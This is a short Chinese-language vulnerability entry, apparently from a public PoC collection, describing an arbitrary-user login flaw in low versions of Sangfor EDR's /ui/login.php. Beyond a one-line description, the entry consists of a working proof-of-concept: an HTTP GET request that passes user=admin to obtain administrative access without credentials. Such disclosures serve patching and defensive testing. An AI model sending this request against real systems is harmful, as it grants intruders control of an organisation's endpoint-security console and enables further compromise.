深信服 EDR /ui/login.php 任意用户登录漏洞

日期: 2021-03-11 | 影响软件: 深信服EDR | POC: 已公开

漏洞描述

深信服 EDR,即终端检测响应平台,其低版本登录逻辑存在逻辑缺陷,导致可以任意用户登录后台管理界面。

PoC代码

GET /ui/login.php?user=admin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15

相关漏洞推荐